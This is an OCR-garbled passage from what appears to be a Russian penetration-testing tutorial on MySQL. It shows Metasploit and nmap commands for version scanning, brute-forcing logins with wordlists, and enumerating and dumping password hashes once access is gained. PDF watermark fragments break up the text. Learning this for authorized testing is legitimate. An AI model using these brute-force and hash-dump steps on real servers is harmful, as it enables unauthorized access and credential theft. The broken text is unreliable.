|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|
|
|
||
|
- |
|
|
|
|
|
d |
|
|
|
|||
|
F |
|
|
|
|
|
|
|
t |
|
|
|
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
P |
|
|
|
|
|
|
NOW! |
o |
|
|
|
||
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
BUY |
|
|
|
|
|||
|
|
|
|
|
to |
|
|
|
|
|
|
|
|
w Click |
|
|
msfm |
> use auxiliary/scanner/mysql/mysql version |
|||||||||
|
|
|
|||||||||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
o |
|
> |
set RHOSTS 172.16.2.54 |
|
. |
|
f-xchan msf auxilary(mysql_version) |
||||||||||
|
|
|
|
|
|
|
.c |
|
|
|
|||
|
|
p |
d |
|
|
|
|
e |
|
|
|
||
|
|
|
|
|
|
|
g |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
msf |
auxilary(mysql_version) |
> |
exploit |
||
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
||
В nmap также существует модуль, который подключается к серверу и вы водит разную полезную информацию: протокол, номер версии, состояние и соль.
|
• |
nmap -sV -sC <target> |
|
|
5.2.3. Брутфорс |
Как только |
найдена, нужно постараться подобрать пароль и жела |
тельно имя пользователя. С именем довольно сложно, не говоря уже о паро ле. Дело в том, что только совсем плохой админ не запускает скрипт mysql_ secure_installation, поэтому в большинстве случаев удаленный вход для root
|
|
|
- root |
root, |
|
root для |
|
|
|
|
|
этого |
|
|
msf > use auxiliary/scanner/mysql/mysql_login |
|
|||
msf |
auxiliary(mysql_login) |
> set USER_FILE /root/login/logins |
|
|
msf |
auxiliary(mysql_login) |
> set PASS_FILE /root/login/password |
||
msf |
auxiliary(mysql_login) |
> |
set RHOSTS 172.16.2.54 |
|
msf auxiliary(mysql_login) |
> |
exploit |
|
|
Д ные команды задают логины и пароли, которые эксплоит будет "пробо а также узлы MySQL, где будет произведена попытка брутфорса. Если
у тебя нет Metasploit (до сих пор), то можно использовать nmap:
nmap --script mysql-brute <target>
--script-args userd.Ь=<path> - свой список логинов --script-args passdb=<path> - свой список паролей
• |
- |
-·. --.-- ------- --·. --- --.----.--- --.---- --··---.-- |
8111 |
··---..--....... |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
|
||
P |
|
|
|
|
|
NOW! |
o |
|
|||
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
o |
|
5.2.4. Что делать дальше? |
|
|
|
|
|
|
|
|
|
m |
|||
w Click |
|
|
|
|
|
|
|
||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
. |
|
|
|
|
|
.c |
|
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
|
df |
|
|
n |
e |
|
|
||
|
|
|
|
-xcha |
|
|
|
|
|
||
nmap -sV --script mysql-databases <target>
nmap -sv --script mysql-users <target>
nmap -sV --script mysql-variaЬles <target>
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
||
nmap -р 3306 <ip> --script mysql-dump-hashes -script args= 'username=root,password=secret'
msf>use auxiliary/admin/mysql/mysql_hashdump
nmap -р 3306 < ip> --script mysql-qu ery --script-\ args= 'qu ery ="<query>" [,username=<username>,passwo·rd=<password>]' msf>use auxiliary/admin/mysql/mysql sql
•
-················--··--····-···-···-··---···-··---··--···--··--···-·······--·······